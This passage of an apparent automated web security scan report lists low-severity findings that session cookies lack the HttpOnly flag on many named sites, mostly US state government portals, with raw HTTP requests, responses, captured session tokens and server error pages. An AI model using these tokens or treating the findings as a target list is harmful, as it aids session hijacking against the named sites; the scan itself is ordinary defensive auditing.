Set-cookie: JSESSIONID=AAF887C5B6B8BA6CE6E71C89D0C3E7B2;Path=/
Set-Cookie: vgnvisitor=2w45tw00bd800001jrJrQQ509e; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1063


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/java
...[SNIP]...

14.149. http://www.georgia.gov/gta/translate/0,2678,4802,00.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgia.gov
Path:   /gta/translate/0,2678,4802,00.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gta/translate/0,2678,4802,00.html HTTP/1.1
Host: www.georgia.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=340E9C88A3B098642D07F0573D95018A; __utmz=212381186.1304125293.1.1.utmccn=(referral)|utmcsr=ga.gov|utmcct=/00/channel_title/0,2094,4802_4969,00.html|utmcmd=referral; __utma=212381186.1206636533.1304125293.1304125293.1304125293.1; __utmc=212381186; __utmb=212381186; vgnvisitor=2w45tM000-c00001jrJpFHTDH0;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:11:04 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=92D9408A882F8E8ED67382FFFFA727EB;Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 6212


<!-- Header -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

14.150. http://www.georgiawildlife.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgiawildlife.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.georgiawildlife.com
Proxy-Connection: keep-alive
Referer: http://www.georgia.gov/external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:01:12 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=q10cgseom8ongqf0n62a1n7e46; expires=Mon, 23 May 2011 04:34:32 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Fri, 29 Apr 2011 20:55:56 GMT
ETag: "e18fa6a0947ebfa84a0ffd4cf9198d18"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...

14.151. http://www.georgiawildlife.com/boating/registration  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgiawildlife.com
Path:   /boating/registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boating/registration HTTP/1.1
Host: www.georgiawildlife.com
Proxy-Connection: keep-alive
Referer: http://www.georgiawildlife.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=8vkabgoe8fgoe50a4tvs8s22u3; has_js=1; __utmz=47653809.1304125303.1.1.utmcsr=georgia.gov|utmccn=(referral)|utmcmd=referral|utmcct=/external/; __utma=47653809.712167714.1304125303.1304125303.1304125303.1; __utmc=47653809; __utmb=47653809.1.10.1304125303

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:01:23 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=8vkabgoe8fgoe50a4tvs8s22u3; expires=Mon, 23 May 2011 04:34:44 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Fri, 29 Apr 2011 20:57:09 GMT
ETag: "bcf616b794e27c89723912a29147f0e7"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...

14.152. http://www.georgiawildlife.com/node/1873  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.georgiawildlife.com
Path:   /node/1873

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /node/1873 HTTP/1.1
Host: www.georgiawildlife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESSb3425e6a829e62b2674e77ae2f9b9d89=ktfftr78kjrcbla6tcejffsmp3; __utmz=47653809.1304163826.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=47653809.712167714.1304125303.1304125303.1304163826.2; __utmc=47653809; __utmb=47653809.1.10.1304163826;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:32:33 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=ktfftr78kjrcbla6tcejffsmp3; expires=Mon, 23 May 2011 16:05:53 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Sat, 30 Apr 2011 12:29:48 GMT
ETag: "bce6c0c54c3ee5e6027013b24732f311"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...

14.153. http://www.goccp.maryland.gov/lists/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.goccp.maryland.gov
Path:   /lists/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lists/index.php HTTP/1.1
Host: www.goccp.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:36:00 GMT
Content-Type: text/html
Connection: close
Server: Apache/2
Set-Cookie: PHPSESSID=77254ae051338ab028c5b4d6ba57ff9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 14316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html><head>
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate" />
<meta http
...[SNIP]...

14.154. http://www.governor.state.pa.us/portal/server.pt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.governor.state.pa.us
Path:   /portal/server.pt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt HTTP/1.1
Host: www.governor.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:38:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.governor.state.pa.us/portal/server.pt/community/governor%27s_web_site/2985
Set-Cookie: ASP.NET_SessionId=qkhzgf2kcgeggr55fv0w4255; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 418

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.governor.state.pa.us/portal/server.pt/community/governor%27s_web_site/2985">here</a>.</h2>
</body></html>
...[SNIP]...

14.155. http://www.governor.wa.gov/news/news-view.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.governor.wa.gov
Path:   /news/news-view.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/news-view.asp HTTP/1.1
Host: www.governor.wa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 30 Apr 2011 12:38:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 844
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCSDQRR=GLGIIBKBABAEEFPLPJEKGIDB; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">                                    
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin te
...[SNIP]...

14.156. http://www.healthynh.com/index-fhc.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.healthynh.com
Path:   /index-fhc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index-fhc.php HTTP/1.1
Host: www.healthynh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:13 GMT
Server: L1c
Set-Cookie: PHPSESSID=7d9f638b0a2407643a5cc7de2db0917a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 17303

<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
   <title>Foundation for Healthy Communities</title>
   <link rel="stylesheet" href="/inc/default.css.phpi" type="
...[SNIP]...

14.157. http://www.heretohelp.pa.gov/portal/server.pt  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.heretohelp.pa.gov
Path:   /portal/server.pt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt HTTP/1.1
Host: www.heretohelp.pa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:38:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.heretohelp.pa.gov/portal/server.pt/community/here_to_help/5068
Set-Cookie: ASP.NET_SessionId=gzhpct55m3hdpi55ys1kj5il; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 406

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.heretohelp.pa.gov/portal/server.pt/community/here_to_help/5068">here</a>.</h2>
</body></html>
<!--Hostna
...[SNIP]...

14.158. http://www.hoosierdata.in.gov/nav.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hoosierdata.in.gov
Path:   /nav.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nav.asp HTTP/1.1
Host: www.hoosierdata.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 30 Apr 2011 12:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRADTD=KEJNAPOBIJKGDMMBEBBIDPGE; path=/
Cache-control: private

<font face="Arial" size=2>
<p>ADODB.Field</font> <font face="Arial" size=2>error '800a0bcd'</font>
<p>
<font face="Arial" size=2>Either BOF or EOF is True, or the current record has been deleted. Req
...[SNIP]...

14.159. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.humanservices.state.pa.us
Path:   /idm/managedidmpub/ca12/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /idm/managedidmpub/ca12/index.jsp HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:38:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=Xn255JB/z7Pw7pmrcL2h6EX7YofxQLN3+qf2C9vCznYViTgcYK5cF5ybg0hR41DyodcUlnlGDCRBCw6Mdy+WenI3MWiVReuxaNm+2hCLtDD8OyC6SJCMJImqXlsTPWeumhmVJnTlDZiVCL7FrU0ri6Fvui+28NUNQ+6icKmVuQL8PgVt54nJdbcWGPsJqhsOdL3pNYcsuksvStKfoRz1EgZEQg/QJ2QYwA+SwXqaR6qNaLW1ZX3MLDYS+tSvKBIK4ZKK46IdUYEzB8r4f8guukdOyn7N3y0BmUK+6UVgUcBBGcuARR/W80f5fYdD8gnAPi+ZmRJijUe5fw3lNjRtRX5ve27U7ZCZ8qifsTXcyTXvCVW3vj1/126x9hkykKpkF2q+EjiCMDxop+HHHAfSA598dcQBvwUAmAhOhLjTCaS+4Se23xXQE+ML3U8kMojuO3gfPmp2DQvezaoYHi9JjWWwH4xB4azWMkNq3a1yvDbODL9+q6RRGM7hMHAPCxUrgBLLc5AIIKtTH7dBItOWubJVnQ7o/x995HISomyKBmfOw5x4/1LK5n24D4OLrsBV; expires=Mon, 29 Apr 2013 12:38:48 GMT; path=/; domain=.state.pa.us
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.humanservices.state.pa.us/idm/logout.jsp?locale=en
Content-Language: en-US
Content-Length: 0
Set-Cookie: JSESSIONID=0000DH9ACykUxxvSiT2oEg7J38I:-1; Path=/
Set-Cookie: JSESSIONID=0000G5gEuvTxUvuQQ6tqmfj9Uwr:-1; Path=/
Server: WebSphere Application Server/6.1


14.160. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.illinois.gov
Path:   /PressReleases/PressReleasesSearch.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PressReleases/PressReleasesSearch.cfm HTTP/1.1
Host: www.illinois.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:53 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=6010680;domain=.illinois.gov;path=/
Set-Cookie: CFTOKEN=22644029;domain=.illinois.gov;path=/
Content-Type: text/html; charset=UTF-8
Server: WebServer


        <HTML>
<HEAD>
<TITLE>Illinois.gov - Illinois Government News Network (IGNN) - Search the News</
...[SNIP]...

14.161. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.illinois.gov
Path:   /PressReleases/ShowPressRelease.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PressReleases/ShowPressRelease.cfm HTTP/1.1
Host: www.illinois.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:56 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=6010688;domain=.illinois.gov;path=/
Set-Cookie: CFTOKEN=38168705;domain=.illinois.gov;path=/
Content-Type: text/html; charset=UTF-8
Server: WebServer


        <HTML>
<HEAD>
<TITLE>Illinois.gov - Illinois Government News Network (IGNN) - Search the News Res
...[SNIP]...

14.162. http://www.illinois.gov/PressReleases/ShowbyM.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.illinois.gov
Path:   /PressReleases/ShowbyM.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PressReleases/ShowbyM.cfm HTTP/1.1
Host: www.illinois.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:53 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=6010682;domain=.illinois.gov;path=/
Set-Cookie: CFTOKEN=41820026;domain=.illinois.gov;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Server: WebServer


        <HTML>
<HEAD>
<TITLE>Illinois.gov - Illinois Government News Network (IGNN) - Press Releases by D
...[SNIP]...

14.163. http://www.in.gov/sliverheader/Welcome.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.in.gov
Path:   /sliverheader/Welcome.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sliverheader/Welcome.do HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.9
Cache-Control: private
Set-Cookie: JSESSIONID=abchuI-VI8kk1fv31AM_s; path=/
Content-Type: text/html
Connection: close
Date: Sat, 30 Apr 2011 12:39:04 GMT
Set-Cookie: BIGipServerlb.www.app.IN.gov-sliverheader=4046653450.36895.0000; expires=Sat, 30-Apr-2011 12:40:04 GMT; path=/
Content-Length: 893


<table width="90%" border="0" align="center" cellpadding="5" cellspacing="0">

<tr>
<td align="center"> <table>
<tr>
<td class="errorTitle"><div align="cent
...[SNIP]...

14.164. http://www.instacam.com/search.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.instacam.com
Path:   /search.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search.asp HTTP/1.1
Host: www.instacam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 30 Apr 2011 12:39:05 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 5722
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQRQSCCA=OIFCGDAEGACGHNPKMDDNIFJM; path=/
Cache-control: private


<HTML>
   <HEAD>
       <TITLE>InstaCam</TITLE>

       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">

               <link href="/main.css" rel="stylesheet" type="text/css" />
           <scri
...[SNIP]...

14.165. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kodakgallery.com
Path:   /gallery/lp/2010/visit_florida/vacation_photos.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gallery/lp/2010/visit_florida/vacation_photos.jsp HTTP/1.1
Host: www.kodakgallery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Expires: -1
Set-Cookie: JSESSIONID=D46B50E50B2D7896BD5D3180384FFEF2.ecom302_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 30-May-2011 12:39:07 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1216050931@kodakgallery.com; Domain=kodakgallery.com; Path=/
Set-Cookie: bookStartTest1=control; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: bookUnlockedLayoutTest=lockedLayout; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: ft_80002=none; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Set-Cookie: abTest=bookStartTest1-bookUnlockedLayoutTest-ft_80002-; Domain=kodakgallery.com; Expires=Sun, 29-Apr-2012 12:39:07 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 30 Apr 2011 12:39:07 GMT
Server: ecom302
Connection: close
Content-Length: 38122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equ
...[SNIP]...

14.166. http://www.legis.louisiana.gov/boards/board_members.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legis.louisiana.gov
Path:   /boards/board_members.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /boards/board_members.asp HTTP/1.1
Host: www.legis.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 30 Apr 2011 12:39:10 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 427
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAAQBDQT=NOEHGLCAFKBPCDAEPEHNNJIJ; path=/
Cache-control: private

<html>
<head><title>Louisiana Boards and Commissions</title></head>
<body BGCOLOR="#FFFFFF">
<p><br>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Ar
...[SNIP]...

14.167. http://www.legis.state.la.us/billdata/bytype.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.legis.state.la.us
Path:   /billdata/bytype.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /billdata/bytype.asp HTTP/1.1
Host: www.legis.state.la.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 672
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAAQBDQT=APEHGLCABKMMOEDDGKLLFLPO; path=/
Cache-control: private


<html>

   <head><title>2005 Regular Session - Instrument Information</title></head>
   <body bgcolor="FFFFFF">
   <p><br>
<table align=center cellpadding=10 border=0>
<tr><td>
<center><h2>2005 R
...[SNIP]...

14.168. http://www.linkedin.com/companies/166141  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /companies/166141

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /companies/166141 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Location: http://www.linkedin.com/company/166141
Set-Cookie: leo_auth_token="GST:ZX3BVkL624kZH12gK83CkLAoXl0K_FNKEQ3JBrT8Grk__r2olpnpjt:1304167152:08db119e86636a18ab0d692b9f330a953178d1ea"; Version=1; Max-Age=1799; Expires=Sat, 30-Apr-2011 13:09:11 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:6563456284922235219"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Thu, 18-May-2079 15:53:19 GMT; Path=/
Set-Cookie: bcookie="v=1&cbe517af-b4ab-41c5-ad8d-0e398f1d4f45"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Thu, 18-May-2079 15:53:19 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Date: Sat, 30 Apr 2011 12:39:12 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19962b45525d5f4f58455e445a4a42198c;expires=Sat, 30-Apr-2011 13:10:19 GMT;path=/;httponly
Content-Length: 0


14.169. http://www.mema.state.md.us/MEMA/content_page.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mema.state.md.us
Path:   /MEMA/content_page.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MEMA/content_page.jsp HTTP/1.1
Host: www.mema.state.md.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
